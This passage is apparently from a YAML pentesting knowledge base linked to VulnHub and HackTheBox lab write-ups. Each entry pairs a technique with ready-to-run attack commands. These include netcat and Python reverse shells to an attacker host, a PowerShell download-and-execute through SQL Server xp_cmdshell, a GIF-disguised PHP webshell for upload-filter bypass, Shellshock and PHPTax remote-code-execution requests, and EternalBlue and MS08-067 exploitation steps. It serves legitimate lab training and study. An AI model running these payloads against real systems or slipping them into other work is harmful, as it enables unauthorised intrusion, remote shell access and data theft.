        cli: "nc -nlvp <attackerport>\n  mongo -p -u <user> <record>\n    db.tasks.insert({\"\
          cmd\": \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip>\
          \ <attackerport> >/tmp/f\"})\n    bye\n"
        description: null
        references: []
        writeups:
        - datetime: 20191028
          infra: VulnHub
          name: 'Node: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nodejs
          - exploit_credsreuse
          - exploit_mongodb
          - privesc_setuid
          url: https://www.vulnhub.com/entry/node-1,252/
          verbose_id: vh#252
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
      exploit_nfs_rw:
        cli: "check available mountpoints\nmount file system via nfs v3\ncheck uid\
          \ of user\ncreate a new local user with nfs user's uid\nchange to new user\n\
          copy ssh public key to .ssh/authorized_keys file\nssh into the target as\
          \ user\ncopy root owned copy of bash from local system to nfs mount\nrunning\
          \ \"./bash -p\" gives root access as euid is carried over during copy operation\n\
          mount nfsv3, create new user with nfs user uid and get root shell\nunmount\
          \ and remove temporary user:\n  showmount -e <targetip>\n  mkdir /tmp/nfs\n\
          \  mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing\
          \ of user ids for shared files\n  ls -l /tmp/nfs # check the uid and use\
          \ it to create new user\n  useradd -u 2008 vulnix\n  su vulnix\n  copy ~/.ssh/id_rsa.pub\
          \ to ~/.ssh/authorized_keys on target host to gain passwordless ssh access\n\
          \  umount /tmp/nfs ; userdel vulnix\n\nshowmount -e <targetip>\n  Export\
          \ list for <targetip>:\n  /home/vulnix *\n  mkdir ./mnt/\nmount <targetip>:/home/vulnix\
          \ ./mnt -o vers=3\nls -l\ngroupadd --gid 2008 vulnix ; useradd --uid 2008\
          \ --groups vulnix vulnix\ncp ~/.ssh/id_rsa.pub ./authorized_keys\nsu vulnix\n\
          cd ./mnt/\nmkdir .ssh/\ncp ./authorized_keys ./.ssh/\nexit\nssh vulnix@<targetip>\n"
        description: when an open nfs share is found, look for available mountpoints,
          mount using `nfsv3` so that we can see the real remote `uid` and `gid`,
          create a new user with expected `uid`, switch user, create the `.ssh` directory,
          copy `id_rsa.pub` to this directory and ssh to gain interactive access on
          the target system
        references:
        - https://blog.christophetd.fr/write-up-vulnix/
        writeups:
        - datetime: 20191010
          infra: VulnHub
          name: 'Lin.Security: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_strace_setuid
          - privesc_docker_group
          url: https://www.vulnhub.com/entry/linsecurity-1,244/
          verbose_id: vh#244
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
        - datetime: 20190920
          infra: VulnHub
          name: 'HackLAB: Vulnix'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_nfs_norootsquash
          - privesc_ssh_authorizedkeys
          url: https://www.vulnhub.com/entry/hacklab-vulnix,48/
          verbose_id: vh#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
      exploit_nodejs:
        cli: ''
        description: inspect source for `assets/js/app/controllers/*.js` files and
          look for rest api calls that could leak sensitive information
        references: []
        writeups:
        - datetime: 20191028
          infra: VulnHub
          name: 'Node: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nodejs
          - exploit_credsreuse
          - exploit_mongodb
          - privesc_setuid
          url: https://www.vulnhub.com/entry/node-1,252/
          verbose_id: vh#252
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
      exploit_nodejs_deserialize:
        cli: ''
        description: user input is passed to `unserialize()` method that could allow
          remote code execution
        references:
        - https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/
        - https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py
        - https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
        - https://0xdf.gitlab.io/2018/08/25/htb-celestial.html
      exploit_pchart:
        cli: 'http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd

          '
        description: the `pChart 2.1.3` web application is vulnerable to directory
          traversal
        references:
        - https://www.exploit-db.com/exploits/31173
        - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb
        writeups:
        - datetime: 20191009
          infra: VulnHub
          name: 'Kioptrix: 2014 (#5)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_pchart
          - exploit_phptax
          - privesc_freebsd
          url: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
          verbose_id: vh#62
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
      exploit_pfsense:
        cli: 'python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport>
          --username foo --password bar

          '
        description: pfsense 2.1.3 is vulnerable to command injection
        references:
        - https://www.exploit-db.com/exploits/43560
        - https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190
      exploit_php_acs_rfi:
        cli: 'curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"
          -d "<?system(''whoami'');?>"

          '
        description: Advanced Comment System 1.0 is vulnerable to remote file inclusion
          and command execution attacks
        references:
        - https://www.exploit-db.com/exploits/9623
      exploit_php_fileupload:
        cli: 'cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php

          subl rs.php # point to <attackerip> and <attackerport>

          nc -nlvp <attackerport>

          # upload rs.php and trigger execution

          '
        description: certain poorly developed php web applications allow unrestricted
          file uploads that can be abused to gain interactive access on the target
          system
        references: []
        writeups:
        - datetime: 20190911
          infra: VulnHub
          name: 'FristiLeaks: 1.3'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_fileupload_bypass
          - privesc_sudo
          - privesc_setuid
          url: https://www.vulnhub.com/entry/fristileaks-13,133/
          verbose_id: vh#133
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
        - datetime: 20190927
          infra: VulnHub
          name: 'hackme: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_setuid
          url: https://www.vulnhub.com/entry/hackme-1,330/
          verbose_id: vh#330
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf
        - datetime: 20190919
          infra: VulnHub
          name: 'hackfest2016: Sedna'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_chkrootkit
          - privesc_cron
          - privesc_bash_reverseshell
          url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
          verbose_id: vh#181
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
      exploit_php_fileupload_bypass:
        cli: 'cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif

          subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a
          to the start of file

          nc -nlvp <attackerport>

          # upload rs.php.gif and trigger execution

          ###

          echo -e ''GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>'' >cmd.gif

          # upload and execute commands

          '
        description: add gif file magicbytes `GIF891` to a php reverse shell file,
          rename it to rs.php.gif and upload to bypass upload filter. sometimes, a
          restrictve waf might still stop file upload. in that case, use a minimal
          command execution php file with gif magicbytes instead of a full php reverse
          shell
        references: []
        writeups:
        - datetime: 20190911
          infra: VulnHub
          name: 'FristiLeaks: 1.3'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_fileupload_bypass
          - privesc_sudo
          - privesc_setuid
          url: https://www.vulnhub.com/entry/fristileaks-13,133/
          verbose_id: vh#133
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
        - datetime: 20190926
          infra: VulnHub
          name: 'IMF: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - exploit_php_fileupload_bypass
          - privesc_bof
          url: https://www.vulnhub.com/entry/imf-1,162/
          verbose_id: vh#162
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf
      exploit_php_reverseshell:
        cli: ''
        description: use php reverse shell code with an exploit to gain interactive
          access on the target system
        references: []
        writeups:
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        - datetime: 20190927
          infra: VulnHub
          name: 'hackme: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_setuid
          url: https://www.vulnhub.com/entry/hackme-1,330/
          verbose_id: vh#330
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
        - datetime: 20191021
          infra: VulnHub
          name: 'Mr-Robot: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_reverseshell
          - privesc_setuid
          - privesc_nmap
          url: https://www.vulnhub.com/entry/mr-robot-1,151/
          verbose_id: vh#151
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf
        - datetime: 20190918
          infra: VulnHub
          name: 'hackfest2016: Quaoar'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_defaultcreds
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_mysql_creds
          - privesc_credsreuse
          url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
          verbose_id: vh#180
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
        - datetime: 20190919
          infra: VulnHub
          name: 'hackfest2016: Sedna'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_chkrootkit
          - privesc_cron
          - privesc_bash_reverseshell
          url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
          verbose_id: vh#181
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
      exploit_php_webshell:
        cli: ''
        description: use the php web shell to execute arbitrary commands and gain
          interactive access on the target system
        references: []
        writeups:
        - datetime: 20191011
          infra: VulnHub
          name: 'Misdirection: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_webshell
          - exploit_bash_reverseshell
          - privesc_sudoers
          - privesc_passwd_writable
          url: https://www.vulnhub.com/entry/misdirection-1,371/
          verbose_id: vh#371
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
      exploit_phptax:
        cli: "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E\
          \ HTTP/1.1\n  Host: <targetip>:<targetport>\n  User-Agent: Mozilla/4.0 (X11;\
          \ Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0\nGET /phptax/data/rce.php?cmd=uname%20-a\
          \ HTTP/1.1\n  Host: <targetip>:<targetport>\n"
        description: the `Phptax 0.8` web application is vulnerable to remote code
          execution
        references:
        - https://www.exploit-db.com/exploits/25849
        writeups:
        - datetime: 20191009
          infra: VulnHub
          name: 'Kioptrix: 2014 (#5)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_pchart
          - exploit_phptax
          - privesc_freebsd
          url: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
          verbose_id: vh#62
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
      exploit_prtg_sensors:
        cli: './46527.sh -u http://<targetip> -c "<prtg session cookie>"

          psexec.py pentest@10.10.10.152

          '
        description: execute a reverse shell command through prtg sensor creation
          dialog and play it to get interactive access on the target system
        references:
        - https://www.exploit-db.com/exploits/46527
        - https://nvd.nist.gov/vuln/detail/CVE-2018-9276
        - https://hipotermia.pw/htb/netmon
        - https://snowscan.io/htb-writeup-netmon/#
      exploit_psexec_login:
        cli: 'psexec <username>@<targetip>

          '
        description: If credentials for a non-administrative user are available, we
          can use `psexec.py` to connect and gain interactive access to the target
          system.
        references:
        - null
      exploit_python_reverseshell:
        cli: 'nc -nlvp 9999

          http://<targetip>/shell.php?cmd=python -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0);
          os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''

          '
        description: use a python reverse shell to gain interactive access on the
          target system
        references:
        - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
        - https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell
        writeups:
        - datetime: 20200625
          infra: HackTheBox
          name: Bashed
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_python_reverseshell
          - privesc_sudo
          - privesc_cron_rootjobs
          url: https://app.hackthebox.eu/machines/118
          verbose_id: htb#118
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
        - datetime: 20190917
          infra: VulnHub
          name: 'Escalate_Linux: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_python_reverseshell
          - privesc_mysql_creds
          - privesc_setuid
          url: https://www.vulnhub.com/entry/escalate_linux-1,323/
          verbose_id: vh#323
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf
      exploit_shellshock:
        cli: 'curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c ''cat /etc/passwd''"
          http://<targetip>/cgi-bin/user.sh

          nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls
          <targetip>

          '
        description: null
        references:
        - https://zayotic.com/posts/oscp-reference/
        - https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/
        - https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: Shocker
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_shellshock
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/108
          verbose_id: htb#108
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf
      exploit_smb_ms08_067:
        cli: "scan:\n  nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1\
          \ <targetip>\n  msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip>\
          \ threads=100 E\nmanual_a:\n  wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py\n\
          \  msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport>\
          \ EXITFUNC=thread -b \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\" -f c -a\
          \ x86 --platform windows\n  nc -nlvp <attackerport>\n  python ms08_067_2018.py\
          \ <targetip> <osid> <targetport>\nmanual_b:\n  searchsploit ms08-067\n \
          \ python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip>\
          \ 1\nmsf:\n  use exploit/windows/smb/ms08_067_netapi\n  set RHOST <targetip>\n\
          \  set LHOST <attackerip>\n  show options\n  exploit\n"
        description: (netapi exploit) for microsoft windows xp systems with open smb
          ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit
          module [`windows/smb/ms08_067_netapi`]()
        ports:
        - 139/tcp
        - 445/tcp
        references:
        - https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067
        - https://github.com/andyacer/ms08_067
        - https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
        - https://blog.rapid7.com/2014/02/03/new-ms08-067/
        - https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
        writeups:
        - datetime: 20191101
          infra: HackTheBox
          name: Legacy
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_smb_ms08_067
          url: https://app.hackthebox.eu/machines/2
          verbose_id: htb#2
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf
      exploit_smb_ms17_010:
        cli: "nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip>\n\
          manual:\n  wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py\n\
          \  msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport>\
          \ EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe\n  nc\
          \ -nlvp <attackerport>\n  python send_and_execute.py <targetip> revshell.exe\n\
          msf:\n  use exploit/windows/smb/ms17_010_eternalblue\n  set RHOST <targetip>\n\
          \  set LHOST <attackerip>\n  show options\n  exploit\n"
        description: (eternalblue exploit) for microsoft windows system with smb v1
          enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue`
        ports:
        - 139/tcp
        - 445/tcp
        references:
        - https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
        - https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
        - https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
        - https://github.com/helviojunior/MS17-010/send_and_execute.py
        writeups:
        - datetime: 20191101
          infra: HackTheBox
          name: Blue
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_smb_ms17_010
          url: https://app.hackthebox.eu/machines/51
          verbose_id: htb#51
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf
      exploit_smb_nullsession:
        cli: ''
        description: smb null sessions leak a lot of sensitive information about the
          target system. it could be useful to access open shares or to get sensitive
          information
        references: []
        writeups:
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
      exploit_smb_usermap:
        cli: 'nc -nlvp <attackerport>

          sudo apt install python python-pip

          pip install --user pysmb

          git clone https://github.com/amriunix/CVE-2007-2447.git

          cd CVE-2007-2447/

          python usermap_script.py <targetip> 139 <attackerip> <attackerport>

          '
        description: samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution
        references:
        - https://nvd.nist.gov/vuln/detail/CVE-2007-2447
        - https://github.com/amriunix/CVE-2007-2447
        writeups:
        - datetime: 20191101
          infra: HackTheBox
          name: Lame
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_smb_usermap
          url: https://app.hackthebox.eu/machines/1
          verbose_id: htb#1
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf
      exploit_smb_web_root:
        cli: ''
        description: smb shared directory is mapped to the web server's root directory.
          read files to obtain sensitive information or upload a reverse shell file
          native to the web server and trigger it's execution to gain interactive
          access on the target system
        references: []
        writeups:
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
      exploit_sql_login:
        cli: 'mssqlclient.py -windows-auth "<username>@<targetip>"

          '
        description: login to the target system using a sql service account
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      exploit_sql_xpcmdshell:
        cli: "SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has\
          \ db sysadmin role, continue if true\n\nEXEC sp_configure 'Show Advanced\
          \ Options', 1;\nreconfigure;\nsp_configure;\nEXEC sp_configure 'xp_cmdshell',\
          \ 1\nreconfigure;\n\nxp_cmdshell \"whoami\"\n\ntype shell.ps1 ## create\
          \ a powershell reverse shell\n  xp_cmdshell \"powershell \"IEX (New-Object\
          \ Net.WebClient).DownloadString(\\\"http://<attackerip>/shell.ps1\\\");\"\
          \npython3 -m http.server 80 ## serve the reverse shell via http\nufw allow\
          \ from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming\
          \ connection from <targetip>\nnc -nlvp <attackerport> ## listen for incoming\
          \ reverse shell connection\n"
        description: use the SQL xp_cmdshell method to gain command execution on the
          target system
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      exploit_sqli:
        cli: 'sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch
          --forms --dump

          '
        description: target system is running a webapp that's vulnerable to sql injection
        references: []
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: CronOS
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - privesc_cron
          url: https://app.hackthebox.eu/machines/11
          verbose_id: htb#11
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf
        - datetime: 20190928
          infra: VulnHub
          name: 'Kioptrix: Level 1.1 (#2)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_cmdexec
          - privesc_kernel_ipappend
          url: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
          verbose_id: vh#23
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf
        - datetime: 20191008
          infra: VulnHub
          name: 'Kioptrix: Level 1.3 (#4)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_shell_escape
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
          verbose_id: vh#25
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
        - datetime: 20191010
          infra: VulnHub
          name: 'Lord Of The Root: 1.0.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_kernel_overlayfs
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
          verbose_id: vh#129
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
      exploit_ssh_authorizedkeys:
        cli: ''
        description: if we have access to a user's `.ssh` directory, copy our `id_rsa.pub`
          file to `.ssh/authorized_keys` to obtain passwordless ssh access
        references: []
        writeups:
        - datetime: 20191010
          infra: VulnHub
          name: 'Lin.Security: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_strace_setuid
          - privesc_docker_group
          url: https://www.vulnhub.com/entry/linsecurity-1,244/
          verbose_id: vh#244
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
        - datetime: 20190920
          infra: VulnHub
          name: 'HackLAB: Vulnix'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_nfs_norootsquash
          - privesc_ssh_authorizedkeys
          url: https://www.vulnhub.com/entry/hacklab-vulnix,48/
          verbose_id: vh#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
      exploit_ssh_bruteforce:
        cli: 'hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip>

          '
        description: use hydra to bruteforce ssh password for a know user
        references: []
        writeups:
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
